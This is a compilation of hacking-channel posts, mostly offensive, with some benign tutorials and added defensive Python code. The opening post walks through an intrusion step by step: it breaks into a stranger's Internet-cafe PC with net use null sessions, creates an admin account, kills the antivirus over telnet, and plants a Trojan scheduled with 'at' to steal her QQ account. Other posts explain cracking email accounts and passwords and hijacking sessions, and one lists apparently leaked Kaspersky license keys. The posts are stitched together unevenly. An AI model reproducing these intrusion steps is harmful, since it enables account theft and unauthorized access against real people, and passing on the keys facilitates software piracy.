🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The first platform that collects and analyzes every new hacking method,
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
▁ ▂ ▄ undercode ▄ ▂ ▁

🦑 Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing

>There is a great deal of Internet cafe management software, and most of it has one loophole or another, so there are many techniques for cracking Internet cafe software: you can surf the Internet for free, use the "command prompt" method, use administrator permissions, and so on. As a result, Internet cafes have become the places where virtual property is most often lost. But as long as the Internet cafe administrator is skilled enough, this situation can be avoided. Let me tell you how I used to get an MM's QQ number in an Internet cafe. It is a little complicated; the point is mainly to let you know some of the commands used during hacking.


πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :


Step 1: first determine the IP of the computer the MM is using. The number and IP address of a computer in an Internet cafe are usually the same or offset by one. For example, the computer numbered 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168.0.1 is left to the router). Not only that, the machine name is also regular: the machine name of computer 20 is usually Wangba20. So as long as you know which computer the MM is using, enter the "command prompt" and Ping Wangba20 to get the IP address, such as 192.168.0.20.

> Step 2: With the IP, you can start connecting to the MM's computer. Because computers in Internet cafes mostly run unpatched Windows 2000, and the login user name is mostly of the form "user number" with an empty password, at the "command prompt" enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection.

> After the connection succeeds, you must close the anti-virus software on the other computer: right-click "My Computer", select "Manage", right-click "Computer Management (Local)" in the window that pops up, select "Connect to another computer", connect to 192.168.0.20, and start the "Telnet" service ("Computer Management" can manage remote computers directly).

-Step 3: Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.

net user user20 / add

net localgroup administrators user20 / add

-Step 4: Go to C:\Winnt\System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", and check "Run as other user" (to run the program as another user). Run the CMD shortcut; after the "Run as another user" window pops up, enter "user20" and press Enter.

-Step 5: Log in to the MM's computer with telnet 192.168.0.20, then download a command-line process-killing tool from the Internet, such as knlps, and close the anti-virus software process over telnet.

-Step 6: Now you can download a Trojan and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy it to the MM's computer. Then use net time //192.168.0.20 to get the time on the MM's computer, for example 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name.exe", to run the Trojan at the specified time.

🦑 With a Trojan, you can naturally know the QQ number used by the MM.

How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this; most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (click "Advanced Settings" and the "Login Mode" option appears).


written by undercode

🦑 Basic knowledge of data record recovery
t.me/UndercodeTesting


🦑 Let's start with the data structure of the hard disk.

Hard disk data structure

When we first buy a hard disk we cannot use it as it is. It has to be partitioned and formatted, and then an operating system installed, before it can be used. Taking the 9x / Me series that we have used until now as the example, we generally divide the hard disk into five parts: the master boot sector, the operating system boot sector, the FAT, the DIR and the Data area (of which only the master boot sector is unique; the others grow in number with the number of partitions).

Master boot sector

The master boot sector is located at track 0, cylinder 0, sector 1 of the entire hard disk, and contains the master boot record MBR (Main Boot Record) and the partition table DPT (Disk Partition Table). The role of the master boot record is to check whether the partition table is correct, determine which partition is the boot partition, and at the end of the program transfer that partition's startup program (that is, the operating system boot sector) into memory for execution. As for the partition table, many people know that it starts with 80H or 00H and ends with 55AAH, is 64 bytes in total, and is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partitioning program (such as Fdisk.exe for DOS), and this sector may differ between operating systems. If you have the intention, you can write one yourself, as long as it can complete the tasks just described, which is why multi-system startup is possible (and also why there are a lot of boot sector viruses).

Operating system boot sector

OBR (OS Boot Record) is the boot sector of the operating system, usually located at track 0, cylinder 1, sector 1 of the hard disk (this is the case for DOS; for systems that start in multi-boot mode it is located in the first sector of the corresponding primary or extended partition). It is the first sector that the operating system can access directly. It contains a boot program and a partition parameter record table called the BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary with the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (for MSDOS, or for the MSDOS-derived Win9x / Me, IO.SYS and MSDOS.SYS). If so, the first file is read into memory and control is handed to it. The BPB parameter block records important parameters such as the start sector, end sector, file storage format, hard disk media descriptor, root directory size, number of FATs and size of the allocation unit (also known as the cluster) of the partition. The OBR is generated by a high-level formatter (e.g. Format.com for DOS).

File allocation table

FAT (File Allocation Table) is the file allocation table of the DOS / Win9x system. For data security there are generally two copies of the FAT; the second FAT is a backup of the first. The FAT area immediately follows the OBR, and its size is determined by the size of the partition and the size of the file allocation unit. There have always been many choices for the FAT format. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but beyond these there are no other FAT formats; systems like Windows NT, OS / 2, UNIX / Linux, Novell etc. have their own file management methods.

Directory area

DIR is the abbreviation of Directory, that is, the root directory area. DIR immediately follows the second FAT. The FAT alone cannot locate a file on the disk; FAT and DIR must work together to locate a file accurately. DIR records the starting unit of each file (or directory) (this is the most important item), the file attributes, and so on. When locating a file, the operating system can determine the file's specific location and size on the disk from the starting unit recorded in the DIR together with the FAT. After the DIR area comes the real data storage area, namely the DATA area.

Data area

Although DATA occupies most of the space on the hard disk, without the preceding parts it is, for us, just meaningless binary code. One thing to note here is that what we usually call formatting (meaning high-level formatting, such as the Format program under DOS) does not clear the data in the DATA area, but only rewrites the FAT; as for partitioning, it only modifies the MBR and OBR. Most of the data in the DATA area is untouched, which is why so much hard disk data can be repaired. But even so, if one of the MBR / OBR / FAT / DIR is destroyed, that is enough to keep our so-called DIY veterans busy for a long time... What needs reminding is that if you defragment the disk regularly, the data in your data area may be contiguous, so even if the MBR / FAT / DIR are all broken, we can use disk editing software (such as DiskEdit under DOS): as long as we find the starting storage location of a file, that file may be recoverable (of course, this requires one premise, that is, that you have not overwritten the file...).

🦑 Hard disk partition

The concept of partitions we usually talk about is nothing more than three types: primary partition, extended partition, and logical partition.

The primary partition is relatively simple, usually located at the very front of the hard disk and forming the logical C disk. No other logical disks are allowed inside a primary partition.

The concept of the extended partition is more complicated, and is also the main cause of confusion between partitions and logical disks. Since the hard disk reserves only 64 bytes of storage for the partition table, and each partition's parameters occupy 16 bytes, the data of only 4 partitions can be stored in the master boot sector, so the operating system allows only 4 partitions. If each logical disk were a partition, the system would allow at most 4 logical disks. For practical applications, 4 logical disks often cannot meet actual needs. In order to build more logical disks for the operating system to use, the system introduced the concept of the extended partition.
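The partition table described above (64 bytes at the end of the sector, four 16-byte entries, boot indicator 80H or 00H, 55AAH signature) is small enough to parse and sanity-check by hand. The following Python example is added here and is not part of the post: it builds a constructed sample sector with one bootable primary partition and one extended partition, parses it, and rejects the kinds of damage a boot sector virus or a bad write leaves behind (wrong signature, invalid boot flag, two bootable entries, overlapping entries). The type codes 0x0B (FAT32) and 0x05 / 0x0F (extended) are the standard values; the sector layout and LBA numbers in the sample are constructed.

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446             # the 64-byte table sits just before the 2-byte signature
ENTRY_SIZE = 16
ENTRY_FMT = "<B3sB3sII"        # boot flag, CHS start, type, CHS end, LBA start, sector count
SIGNATURE = 0xAA55             # stored on disk as the bytes 55 AA
EXTENDED_TYPES = {0x05, 0x0F}  # standard type codes for an extended partition container


def build_entry(boot_flag, ptype, lba_start, sectors):
    """Build one constructed 16-byte entry; CHS fields use the 'LBA only' filler FE FF FF."""
    return struct.pack(ENTRY_FMT, boot_flag, b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba_start, sectors)


def build_sample_mbr():
    """Constructed sample sector: bootable FAT32 primary, one extended container, two empty slots."""
    table = (
        build_entry(0x80, 0x0B, 63, 2_097_152)            # C: primary partition, bootable
        + build_entry(0x00, 0x05, 2_097_215, 4_194_304)   # extended partition holding logical disks
        + b"\x00" * (ENTRY_SIZE * 2)                      # unused slots are all zero
    )
    return b"\x00" * TABLE_OFFSET + table + struct.pack("<H", SIGNATURE)


def parse_partition_table(sector):
    """Validate an MBR and return its non-empty entries; raise ValueError on signs of corruption."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    (sig,) = struct.unpack_from("<H", sector, SECTOR_SIZE - 2)
    if sig != SIGNATURE:
        raise ValueError(f"bad signature 0x{sig:04X}; expected 0xAA55")
    entries = []
    for i in range(4):
        boot, _, ptype, _, lba, count = struct.unpack_from(ENTRY_FMT, sector, TABLE_OFFSET + i * ENTRY_SIZE)
        if boot not in (0x00, 0x80):
            raise ValueError(f"entry {i}: boot indicator must be 0x00 or 0x80, got 0x{boot:02X}")
        if ptype == 0x00:
            continue  # empty slot
        if count == 0:
            raise ValueError(f"entry {i}: typed partition with zero length")
        entries.append({
            "index": i,
            "bootable": boot == 0x80,
            "type": ptype,
            "extended": ptype in EXTENDED_TYPES,
            "lba_start": lba,
            "lba_end": lba + count - 1,
        })
    if sum(e["bootable"] for e in entries) > 1:
        raise ValueError("more than one entry flagged bootable")
    # overlapping ranges are a classic sign of a damaged or tampered table
    ordered = sorted(entries, key=lambda e: e["lba_start"])
    for prev, cur in zip(ordered, ordered[1:]):
        if cur["lba_start"] <= prev["lba_end"]:
            raise ValueError(f"entries {prev['index']} and {cur['index']} overlap")
    return entries


def corrupt_signature(sector):
    """Copy of the sector with its 55 AA signature zeroed, as a bad write might leave it."""
    return sector[:-2] + b"\x00\x00"


if __name__ == "__main__":
    for entry in parse_partition_table(build_sample_mbr()):
        print(entry)
```

Reading a real first sector into `parse_partition_table` (for example the first 512 bytes of a disk image) is enough to tell whether the table is intact before any recovery tool is pointed at the DATA area.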


The basic knowledge of data recovery is almost introduced to you.

written by undercode

🦑 Talk about the specific role of the session
t.me/UndercodeTesting


1) First of all, the session is implemented by the language and has nothing to do with the web server; for example, the php session is implemented by the php language.

2) Second, the content of the session is stored on the server. But everyone knows the session is often used for authentication, to identify each user. How does it correspond to the client?

> In fact, it is very simple. When the user submits a browsing request, the cookie carries a session field, which in php is SESSIONID. In this way the server knows that the requester's session is stored under that SESSIONID and can read the corresponding data. Where did this SESSIONID come from?

3) Again, the session has a default timeout; I remember asp's seems to be 20 minutes, but I am not sure. So if you cross-site someone and only get the cookie after a long time, you can't log in. This is also why it has been said that the Dongwang forum was cross-sited and yet you couldn't log in to the backend, and why legend has it that the session cannot be forged: at that time there were no tools like SessionIE to keep the session from expiring. Back then, if the administrator happened to be cross-sited and had not logged out of the backend, you could log in to the backend with that cookie, because the sessionid had not expired.

4) Also, tools like SessionIE are not omnipotent. If the web program is well written, when the cross-sited user logs out of the system the cookie and session are destroyed, and the attacker cannot continue the session. Because the session corresponding to this sessionid no longer exists on the server side, even though you submit the sessionid there is no matching session data on the server. The server program cannot obtain the session content required for authentication, and naturally the authentication fails.

5) Finally, such tools can be written as cgi programs in languages such as php that support sockets. Asp's XmlHTTP should be subject to cross-domain restrictions. That is to say, I put a php program on the broiler, have it read the cookie list regularly, then use the curl library to load the cookie and access the corresponding url, so the state is not lost and you can turn off your PC.

6) In the end, there is nothing mysterious or bizarre about the session. Its essence is just a piece of data saved on the server side. This data has a unique ID, which the server tells the client through a Set-Cookie. Then, when the client requests with this ID, the server can associate the session with the client.
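To make points 2, 3, 4 and 6 concrete, here is an added Python example (not from the post, and not tied to any real php or asp implementation) of a minimal server-side session table: the ID is random and is all the cookie carries, an idle timeout expires the record, and logout deletes it so a copied ID presented later finds nothing. The 20-minute idle timeout is the value the post recalls for asp; the 8-hour absolute lifetime is an assumed hardening not described in the post, included because a session that is merely kept alive by periodic requests should still end eventually. The cookie name SESSIONID follows the post; `FakeClock` exists only so the expiry logic can be exercised without waiting.

```python
import secrets
import time

IDLE_TIMEOUT = 20 * 60          # the post's recollection of the asp default: 20 minutes idle
ABSOLUTE_LIFETIME = 8 * 3600    # assumed hard cap (not from the post): kept-alive sessions still end


class SessionStore:
    """Server-side session table keyed by a random ID; the ID is all the cookie carries."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}  # session_id -> {"data": ..., "last_seen": t, "created": t}

    def create(self, data):
        sid = secrets.token_urlsafe(32)  # unguessable; this is what Set-Cookie would send
        now = self._clock()
        self._sessions[sid] = {"data": dict(data), "last_seen": now, "created": now}
        return sid

    def lookup(self, sid):
        """Return the session data for a presented ID, or None if it is unknown or expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT or now - entry["created"] > ABSOLUTE_LIFETIME:
            del self._sessions[sid]  # expired: forget it so the ID can never be revived
            return None
        entry["last_seen"] = now  # each request within the window refreshes the idle timer
        return entry["data"]

    def destroy(self, sid):
        """Logout: drop the server-side record so a copied ID is useless afterwards."""
        self._sessions.pop(sid, None)

    def cookie_header(self, sid):
        """The Set-Cookie line the server would answer with (cookie name as in the post)."""
        return f"Set-Cookie: SESSIONID={sid}; HttpOnly; Secure; SameSite=Lax"


class FakeClock:
    """Controllable clock so expiry can be demonstrated without real waiting."""

    def __init__(self):
        self.now = 1_000_000.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def demo():
    """Walk through the post's scenarios and report which outcome each produced."""
    clock = FakeClock()
    store = SessionStore(clock)
    sid = store.create({"user": "admin", "authenticated": True})
    results = {"fresh": store.lookup(sid) is not None}
    clock.advance(19 * 60)
    results["kept_alive"] = store.lookup(sid) is not None    # request inside 20 min refreshes it
    clock.advance(21 * 60)
    results["idle_expired"] = store.lookup(sid) is None      # nobody touched it for 21 min
    sid2 = store.create({"user": "admin", "authenticated": True})
    store.destroy(sid2)                                       # the admin logs out of the backend
    results["after_logout"] = store.lookup(sid2) is None     # same ID presented later: no data
    return results


if __name__ == "__main__":
    print(demo())
```

The `after_logout` case is exactly the well-written-program behaviour of point 4: the submitted sessionid is syntactically fine, but the server holds no record for it, so authentication cannot succeed.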

written by undercode

🦑 Kaspersky Internet Security ( KIS ) 91 Days OEM Trial Keys:

4CH4C-PPFDT-NFK4B-45R69
WN2CH-P55VX-B53EK-UY222
NQJMW-GBXCX-HSJZ3-Z2ZQS
783RV-DQRXR-XXVM9-93HKM ( for Mac )
Kaspersky Anti-Virus ( KAV ) 91 Days OEM Trial Key:

JHJ7C-C69PX-MQY3J-PKG5B
D36NR-H27XY-5MVEQ-6WUFX
QTZJM-3EA1P-VNFSV-HPWFX
52MFR-XMPS3-RPXBM-K6T5E

Kaspersky Total Security 91 Days OEM Trial Key:

B3DFM-Q3KGA-UP7WG-X5SQ6
VYRVR-YHE4C-QQXMK-PVYJE ( for Android )
Kaspersky Internet Security for Android 90 days :

BYK9U-EHE8S-J1WY8-SG1CN
JAPXZ-9G9EJ-CSUV2-7YQUS
Kaspersky Small Office Security for 91 days

BJT18-15VFY-DTQ7C-U2NBS
VACVK-SJ4E4-9GN3T-WCJD8
BJSYM-2YX3V-1RV9S-UHVYM
YGXVQ-1VF6D-6B7EZ-G5SK7
4CH4C-PPFDT-NFK4B-45R69
BYK9U-EHE8S-J1WY8-SG1CN
AKHW5-HRNA6-FKVD9-QYW8C


🦑 Three ways to crack an Email account
t.me/UndercodeTesting

E-mail is not safe. There may be a weak link at each stage of the process of sending, transmitting and receiving mail. If a malicious user takes advantage of such a vulnerability, he can easily hack the account and obtain the content of the mail.



1. Exploit the loopholes in the mail server operating system

The mail server software runs on a specific operating system, such as Linux, Windows NT / 2000, etc. The default installation and configuration of these operating systems are insecure, and hackers can easily invade the system and obtain all user names and passwords.

1 Windows server

If it is an Exchange Mail Server based on Windows 2000, the system itself has not been configured for security at all and several services are open. Intruders can use the terminal server combined with the Chinese input method vulnerability, or IIS's Buffer Overflow, to obtain Administrator permissions, use pwdump3 to export the password hashes, and then use L0phtCrack with a dictionary or Brute Force to crack the user passwords. According to experience, if the password is simple it can be cracked in a few minutes, and Brute Force on passwords of length 8 or less can finish within a day.

2 Linux / UNIX server

UNIX systems generally use Sendmail as the mail system. After gaining control of the system, software such as John can crack the passwords from /etc/passwd or /etc/shadow. If a database is used to store user information and passwords, it is also easy to export.

🦑 2. Exploit the loopholes in the mail server software itself

The most common mail server programs are Sendmail, Qmail, etc., and they have security flaws to varying degrees. Taking Sendmail as an example, in old versions you could telnet to port 25, enter wiz, then enter shell, and get a root shell; the debug command could also give root permissions. Qmail is more secure than Sendmail, but Qpopper has a Buffer Overflow defect through which a remote root shell can be obtained to control the system.

Even if the mail server is secure, an intruder can still obtain more information, such as user names. Telnet to port 25 and enter expn tom or vrfy tom to check whether the user tom exists in the system. Although the latest version of Sendmail disables these two commands, you can still determine whether a user exists by forging the sender and then using rcpt to.

Having obtained a user name, one can telnet to port 110 and try connecting with simple passwords, or apply a dictionary to crack it.

Therefore, it is necessary to prohibit relaying for non-local domains, or to use the module many ISPs use to add SMTP authentication, which can strengthen the security of the mail server.

🦑 Besides receiving mail in POP3 mode, it is more popular to process mail through a WEB interface. This method is not without weaknesses. Generally, a CGI accepts the FORM parameters passed by the user, including the username and password; if they are correct, you enter the mail-processing page. To crack the passwords of known users, there are many programs that use dictionaries or brute-force combinations; the most famous is Xiao Rong's "Snow Tracking". When the password is simple, results come quickly.

WEB mail systems have a "forgot password" option: if you can crack the other mailbox that the password is sent back to, or guess the answer to the prompt question, you can also succeed.

3. Eavesdropping during the transmission of mail

Install a Sniffer on the network, set it to listen for packets sent to port 110 of the external server, and look for the user and pass strings in the collected data to see the user name and its password.


written by undercode
🦑 FAST BEGINNERS TIPS
> Three common methods used by hackers to crack passwords
t.me/UndercodeTesting


🦑 Obtaining the system administrator's password by cracking, and thereby taking control of the server, is an important method for hackers. There are many ways to crack or obtain the administrator password; the following are the three most common.



(1) Guessing simple passwords: Many people use their own or family members' birthdays, phone numbers, room numbers, simple numbers, or ID numbers; others use their own names or the names of children, spouses, or pets; and some system administrators use "password", or even no password at all, so hackers can easily guess the password.

(2) Dictionary attack: If guessing simple passwords fails, the hacker starts a dictionary attack, that is, using a program to try every word in a dictionary. Dictionary attacks can use repeated logins, or collect encrypted passwords and try to match them against words in an encrypted dictionary. Hackers usually use an English dictionary or a dictionary in another language. They also use additional kinds of dictionary databases, such as names and commonly used passwords.

(3) Brute force guessing: similar to dictionary attacks, but the hacker tries all possible combinations of characters. A password composed of 4 lowercase letters can be cracked in a few minutes, while a longer password composed of uppercase and lowercase letters, numbers and punctuation has about 10 trillion possible combinations. If 1 million combinations can be tried per second, it can be cracked within a month.
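The three methods map directly onto checks a defender can run at the moment a password is set. The following Python example is added here and is not from the post: it rejects all-digit values of the lengths birthdays, phone and ID numbers come in (method 1), words from a constructed stand-in for an attacker's word list, with or without trailing digits, and the user's own names (methods 1 and 2), and anything whose full character-class keyspace an attacker at the post's 1 million guesses per second would exhaust in under an assumed 30-day floor (method 3). COMMON_WORDS and the 30-day threshold are constructed assumptions, not values from the post.

```python
import re

GUESSES_PER_SECOND = 1_000_000        # the rate the post quotes for a brute-force attacker
MIN_SECONDS_TO_EXHAUST = 30 * 86400   # assumed policy floor: at least 30 days at that rate

# Constructed stand-in for the word lists a dictionary attack (method 2) is fed.
COMMON_WORDS = {"password", "admin", "letmein", "welcome", "dragon", "football"}


def charset_size(pw):
    """Size of the character-class mix that covers the password (the brute-force alphabet, method 3)."""
    size = 0
    if re.search(r"[a-z]", pw):
        size += 26
    if re.search(r"[A-Z]", pw):
        size += 26
    if re.search(r"[0-9]", pw):
        size += 10
    if re.search(r"[^A-Za-z0-9]", pw):
        size += 33  # printable ASCII punctuation
    return size


def seconds_to_exhaust(pw, rate=GUESSES_PER_SECOND):
    """Worst-case time to try every combination of the password's alphabet at its length."""
    return charset_size(pw) ** len(pw) / rate


def looks_like_personal_number(pw):
    """Method 1: all-digit strings of the lengths birthdays, phone and ID numbers come in."""
    return pw.isdigit() and 4 <= len(pw) <= 18


def check_password(pw, names=()):
    """Return (accepted, reasons); names are the user's own, family and pet names (method 1)."""
    reasons = []
    low = pw.lower()
    if pw == "":
        reasons.append("empty password")
    if looks_like_personal_number(pw):
        reasons.append("digits only: guessable as a birthday, phone or ID number")
    if low in COMMON_WORDS or low.rstrip("0123456789") in COMMON_WORDS:
        reasons.append("dictionary word (with or without trailing digits)")
    for name in names:
        if name and name.lower() in low:
            reasons.append(f"contains a personal name: {name}")
    if pw and seconds_to_exhaust(pw) < MIN_SECONDS_TO_EXHAUST:
        days = seconds_to_exhaust(pw) / 86400
        reasons.append(f"brute-forceable in about {days:.1f} days at {GUESSES_PER_SECOND:,} guesses/s")
    return (not reasons, reasons)


if __name__ == "__main__":
    for candidate in ["abcd", "19851203", "password1", "Rover2019!", "Tr0ub4dor&3xample"]:
        print(candidate, check_password(candidate, names=["Rover", "tom"]))
```

The keyspace figure is deliberately the attacker's worst case: a password that only looks complex but reuses a dictionary word still fails on the dictionary check, which is why the checks are combined rather than relying on length alone.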


written by undercode

🦑 Network test commands that must be learned
t.me/UndercodeTesting


>Understanding and mastering the following three commands will help you detect network faults faster, thereby saving time and improving efficiency.

🦑 ping

Ping is a very useful tool for testing network connection status and packet sending and receiving. It is the most commonly used command for network testing. Ping sends an echo request packet to the target host and asks the target host to reply after receiving it, thereby judging the network's response time and whether the local machine is connected to the target host.

If the ping is unsuccessful, you can predict the failure in the following aspects: network cable failure, incorrect network adapter configuration, incorrect IP address. If the ping is successful and the network is still unavailable, the problem is probably in the software configuration of the network system. Successful ping can only guarantee that there is a connected physical path between the machine and the target host.

🦑 Command format:

ping <ip address or host name> [-t] [-a] [-n count] [-l size]

Parameter meaning:

-t sends data to the target host non-stop;
-a displays the network address of the target host in ip address format;
-n count specifies how many times to ping, the number being given by count;
-l size specifies the size of the packets sent to the target host.

🦑 For example, when your machine cannot access the Internet, first you want to confirm whether the failure is in the local LAN. Assuming the IP address of the proxy server on the LAN is 192.168.1.1, you can use the ping 192.168.1.1 command to check whether the machine is connected to the proxy server. As another example, the common command to test whether the local network card is installed correctly is ping 127.0.0.1.

🦑 tracert

The tracert command is used to display the path that the data packet traverses to the target host and the time to reach each node. The command function is similar to ping, but the information it obtains is much more detailed than the ping command. It displays the entire path taken by the packet, the node's IP, and the time it takes. This command is more suitable for large networks.

🦑 Command format:

tracert <ip address or host name> [-d] [-h maximum_hops] [-j host_list] [-w timeout]

Parameter meaning:

-d Does not resolve the name of the target host;
-h maximum_hops specifies the maximum number of hops to the target address;
-j host_list releases the source route according to the address in the host list;
-w timeout specifies the timeout interval; the program's default time unit is milliseconds.

For example, if you want to know the detailed transmission path information between your computer and the target host www.cce.com.cn, you can enter tracert www.cce.com.cn in ms-dos mode.

🦑 If we add some parameters after the tracert command, we can also detect other more detailed information. For example, use the parameter -d to specify that the program also resolves the domain name of the target host when tracking the path information of the host.

netstat

The netstat command can help network administrators understand the overall usage of the network. It can display the detailed information of the currently active network connection, such as displaying network connection, routing table and network interface information. It can count the total number of network connections currently in operation.

With command parameters, netstat can display the usage status of each protocol, such as the tcp, udp and ip protocols. In addition, you can select a specific protocol and view its details, display the port numbers of all hosts, and display the current host's detailed routing information.

> Command format:

netstat [-r] [-s] [-n] [-a]

Parameter meaning:
-r displays the contents of the local routing table;
-s displays the usage status of each protocol (including tcp, udp and ip);
-n displays addresses and ports in numeric form;
-a displays all ports on the host computer.
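Reading netstat output by eye scales badly once a host has more than a handful of connections. The following Python example is added here and is not from the post: it parses constructed sample lines in the Windows netstat -an layout and produces the summary an administrator actually wants from "the overall usage of the network": which TCP ports are listening, how many established connections go to each remote address, which UDP ports are bound, and which established connections use a remote port outside an assumed expected set. The sample lines (documentation address ranges) and the expected-port list are constructed for the example.

```python
from collections import Counter

# Constructed sample of `netstat -an` output in the Windows layout; addresses are documentation ranges.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED
  TCP    192.168.1.20:49713     203.0.113.10:443       ESTABLISHED
  TCP    192.168.1.20:49720     198.51.100.7:6667      ESTABLISHED
  TCP    192.168.1.20:49731     203.0.113.55:80        TIME_WAIT
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:500            *:*
"""


def split_endpoint(endpoint):
    """Split 'addr:port' into (addr, port); the port is None for the UDP wildcard '*:*'."""
    addr, _, port = endpoint.rpartition(":")
    return addr, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn netstat -an lines into dicts; header, title and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        local_addr, local_port = split_endpoint(fields[1])
        remote_addr, remote_port = split_endpoint(fields[2])
        rows.append({
            "proto": fields[0],
            "local_addr": local_addr, "local_port": local_port,
            "remote_addr": remote_addr, "remote_port": remote_port,
            "state": fields[3] if len(fields) > 3 else None,  # UDP lines carry no state column
        })
    return rows


def summarize(rows):
    """Counts an administrator wants at a glance: what is listening and who the host talks to."""
    listening = sorted(r["local_port"] for r in rows if r["state"] == "LISTENING")
    established = Counter(r["remote_addr"] for r in rows if r["state"] == "ESTABLISHED")
    udp_ports = sorted(r["local_port"] for r in rows if r["proto"] == "UDP")
    return {"listening_tcp": listening, "established_by_peer": dict(established), "udp_bound": udp_ports}


def unusual_connections(rows, expected_ports=(80, 443)):
    """Established connections whose remote port is not in the (assumed) expected set."""
    return [r for r in rows if r["state"] == "ESTABLISHED" and r["remote_port"] not in expected_ports]


if __name__ == "__main__":
    parsed = parse_netstat(SAMPLE_NETSTAT)
    print(summarize(parsed))
    for row in unusual_connections(parsed):
        print("unexpected:", row["remote_addr"], row["remote_port"])
```

Feeding real output is a matter of replacing `SAMPLE_NETSTAT` with the captured text of `netstat -an`; the `-n` form is what keeps the parser simple, since names are never resolved.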
written by undercode
🦑 helpful Networking tests